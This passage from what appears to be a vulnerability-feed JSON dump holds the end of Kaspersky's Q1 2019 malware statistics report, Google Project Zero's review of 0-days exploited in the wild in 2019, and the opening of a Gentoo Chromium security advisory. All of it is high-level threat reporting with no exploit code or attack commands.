Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\n_Geography of mobile ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ 
\n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019_[ 
(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. 
Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often difficult, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that in-depth attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome. 
To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). The vulnerability is a race condition caused by a lack of thread synchronization during undocumented system calls, resulting in a use-after-free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab in recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities targeted by the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. 
This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24.16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17.17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. 
They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46.16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44.14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43.17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a 
percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "modified": "2019-05-23T10:00:53", "published": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195", "CVE-2018-8653", "CVE-2019-0676", "CVE-2019-0703", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0880", "CVE-2019-1132", "CVE-2019-1367", "CVE-2019-13720", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-2215", "CVE-2019-5786", "CVE-2019-7286", "CVE-2019-7287", "CVE-2020-0674"], "description": "Posted by Maddie Stone, Project Zero\n\nIn May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used \u201cin the wild\u201d and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we\u2019ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. 
In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019. \n\nWhen I had the idea for this \u201cYear in Review\u201d blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there\u2019d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or\u2026 but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\n\nThe rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.\n\n# The Basics\n\nIn 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). 
This seems approximately average for years 2014-2017 with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded and so the numbers for 2014 have been doubled as an approximation. \n\n[](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)\n\nThe largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don\u2019t know the true detection rate of all 0-day exploits, it\u2019s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild is increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we\u2019d clearly know that to be false.\n\nAll of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>). \n\n## 0-days by Vendor\n\nOne of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world. 
\n\nWhile Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it\u2019s more likely that we see more Microsoft 0-days due to detection bias. Because Microsoft has been a target before some of the other platforms were even invented, there have been many more years of development into 0-day detection solutions for Microsoft products. Microsoft\u2019s ecosystem also allows for 3rd parties, in addition to Microsoft itself, to deploy detection solutions for 0-days. Having more people looking for 0-days with varied detection methodologies suggests that more 0-days will be found.\n\n[](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)\n\n# Microsoft Deep-Dive\n\nFor 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it\u2019s worthwhile to dive into the Microsoft bugs to see what we can learn since it\u2019s the only platform we have a decent sample size for. \n\nOf the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it\u2019s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software. \n\nOut of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. 
Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release. And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.\n\nEven just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant target for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?\n\nCVE | Windows 7 SP1 | Windows 8.1 | Windows 10 | Win 10 1607 | Win 10 1703 | Win 10 1803 | Win 10 1809 | Win 10 1903 | Exploitation of Latest SW Release? | Component \n---|---|---|---|---|---|---|---|---|---|--- \nCVE-2019-0676 | X | X | X | X | X | X | X | | Yes (1809) | IE \nCVE-2019-0808 | X | | | | | | | | N/A (1809) | win32k \nCVE-2019-0797 | | X | X | X | X | X | X | | Exploitation Unlikely (1809) | win32k \nCVE-2019-0703 | X | X | X | X | X | X | X | | Yes (1809) | Windows SMB \nCVE-2019-0803 | X | X | X | X | X | X | X | | Exp More Likely (1809) | win32k \nCVE-2019-0859 | X | X | X | X | X | X | X | | Exp More Likely (1809) | win32k \nCVE-2019-0880 | X | X | X | X | X | X | X | X | Exp More Likely (1903) | splwow64 \nCVE-2019-1132 | X | | | | | | | | N/A (1903) | win32k \nCVE-2019-1367 | X | X | X | X | X | X | X | X | Yes (1903) | IE \nCVE-2019-1429 | X | | X | X | X | X | X | X | Yes (1903) | IE \nCVE-2019-1458 | X | X | X | X | | | | | N/A (1909) | win32k \n\n## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429\n\nWhile this blog post\u2019s goal is not to detail each 0-day used in 2019, it\u2019d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other with all 4 being exploited in the wild by the same actor [according to Google\u2019s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>). \n\nOur [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we\u2019ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was \u201cfixed\u201d as CVE-2019-1367, but it turns out the patch didn\u2019t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, Ivan Fratric also found a variant of the original bug ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft\u2019s patch was again incomplete. This issue was patched as CVE-2020-0674. 
\n\nA more thorough discussion on variant analysis and complete patches is due, but at this time we\u2019ll simply note: the attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then the particular bugs were known. If we as an industry want to make 0-days harder, we can\u2019t give attackers four chances at the same bug. \n\n# Memory Corruption\n\n63% of 2019\u2019s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-frees being a common target is nothing new. \u201c[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)\u201d, the seminal work describing stack-based memory corruption, was published back in 1996. But it\u2019s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there\u2019s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don\u2019t know for certain that that proportion is false, we can't know either way, because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and the fact that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don\u2019t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today, and so I think we may just be better at detecting these exploits. 
Logic and design bugs, on the other hand, rarely look the same, because by their nature they\u2019re taking advantage of a specific flaw in the design of that specific component, thus making them more difficult to detect than standard memory corruption vulns.\n\nEven if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users, and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.\n\n# More Thoughts on Detection\n\nAs we\u2019ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: \u201cWhat is the detection rate of 0-day exploits?\u201d and \u201cHow many 0-day exploits are used without being detected?\u201d. \n\nWe, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than on any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days, as do third party security companies. We don\u2019t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there\u2019s less likelihood of detecting 0-days on those platforms too. 
An area for big growth is detecting 0-days on platforms other than Microsoft Windows, and what level of access a vendor provides for detection.\n\n## Who is doing the detecting?\n\nAnother interesting side of detection is that a single security researcher, Cl\u00e9ment Lecigne of Google's TAG, is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we would have detected a third fewer of the 0-days actually used in the wild if it weren\u2019t for Cl\u00e9ment and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that\u2019s a worrying sign for how we\u2019re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-day exploits that are used in the wild. \n\nOut of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I\u2019d expect that the vendor of a platform would be best positioned to detect 0-days, with their access to the most telemetry data, logs, the ability to build detections into the platform, \u201ctips\u201d about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally? 
Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome, since it\u2019s so difficult for external researchers to get into those platforms and detect exploitation.\n\n## \u201cClandestine\u201d 0-day reporting\n\nAnecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than as a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users, if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.\n\n# 0-day Detection on Mobile Platforms\n\nAs mentioned above, an especially interesting and needed area for development is the mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users, and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit, according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used; we\u2019re just not finding them. 
The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon, due to the \u201cwalled garden\u201d of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it\u2019s so difficult for non-vendors to deploy solutions, we as users and the security community rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes: how do we as fellow security professionals incentivize the vendors to prioritize this?\n\nAnother interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day targeting Android since we started tracking 0-days. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn\u2019t mean none were used. Instead it means we aren\u2019t detecting well enough and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched, and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting the mobile platforms, iOS and Android, is a focus for Project Zero in 2020.\n\n# Detection on Other Platforms\n\nIt\u2019s interesting to note that other popular platforms had no 0-days detected over the same period, such as Linux, Safari, or macOS. 
While no 0-days have been publicly detected in these operating systems, we can have confidence that they are still targets of interest, based on the number of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro\u2019s OfficeScan is worth targeting, then so are the other, much more prevalent products. If that\u2019s the case, then again it leads us back to detection. We should also keep in mind, though, that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we can\u2019t make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nHere\u2019s our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish, based on feedback from you and as our own knowledge and experience continue to grow. We started this effort with the assumption of finding a multitude of different conclusions, primarily \u201ctechnical\u201d, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world. \n\nAlong with publishing this Year in Review today, we\u2019re also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you\u2019re interested in more details about the different 0-days exploited in the wild in 2019. 
\n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2019-03-28T06:33:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2018-17479", "CVE-2019-5788", "CVE-2019-5787"], "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details. \n\n### Impact\n\nPlease review the referenced CVE identifiers and Google Chrome Releases for details. 
